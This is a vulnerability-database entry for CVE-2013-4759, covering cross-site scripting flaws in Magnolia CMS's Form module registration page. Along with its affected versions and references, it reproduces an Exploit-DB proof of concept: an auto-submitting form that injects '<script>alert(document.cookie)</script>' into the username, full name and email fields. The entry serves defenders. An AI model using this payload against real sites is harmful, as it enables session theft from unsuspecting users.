CVE-2013-4759
Description
Multiple cross-site scripting (XSS) vulnerabilities in the Magnolia Form module 1.x before 1.4.7 and 2.x before 2.0.2 for Magnolia CMS allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) fullname, or (3) email parameter to magnoliaPublic/demo-project/members-area/registration.html.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/61423/info
Magnolia CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable.
<form action="http://www.example.com/magnoliaPublic/demo-project/members-area/registration.html" method="post" name="main">
<input type="hidden" name="mgnlModelExecutionUUID" value="8417fe0e-8f61-4d21-bdf1-c9c23b13ba14">
<input type="hidden" name="password" value='password'>
<input type="hidden" name="passwordConfirmation" value='password'>
<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="fullName" value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="email" value='"><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| magnolia-cms | magnolia_form_module | 1.4 | |
| magnolia-cms | magnolia_form_module | 1.4.1 | |
| magnolia-cms | magnolia_form_module | 1.4.2 | |
| magnolia-cms | magnolia_form_module | 1.4.3 | |
| magnolia-cms | magnolia_form_module | 1.4.4 | |
| magnolia-cms | magnolia_form_module | 1.4.5 | |
| magnolia-cms | magnolia_form_module | 1.4.6 | |
| magnolia-cms | magnolia_form_module | 2.0 | |
| magnolia-cms | magnolia_form_module | 2.0.1 | |
| magnolia-cms | magnolia_cms | - | |
References
- http://archives.neohapsis.com/archives/bugtraq/2013-07/0160.html
- http://osvdb.org/95628
- http://packetstormsecurity.com/files/122527/Magnolia-CMS-5.0.1-Community-Edition-Cross-Site-Scripting.html
- http://www.securityfocus.com/bid/61423
- https://exchange.xforce.ibmcloud.com/vulnerabilities/85940
- https://www.htbridge.com/advisory/HTB23163
- http://archives.neohapsis.com/archives/bugtraq/2013-07/0160.html
- http://osvdb.org/95628
- http://packetstormsecurity.com/files/122527/Magnolia-CMS-5.0.1-Community-Edition-Cross-Site-Scripting.html
- http://www.securityfocus.com/bid/61423
- https://exchange.xforce.ibmcloud.com/vulnerabilities/85940
- https://www.htbridge.com/advisory/HTB23163
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.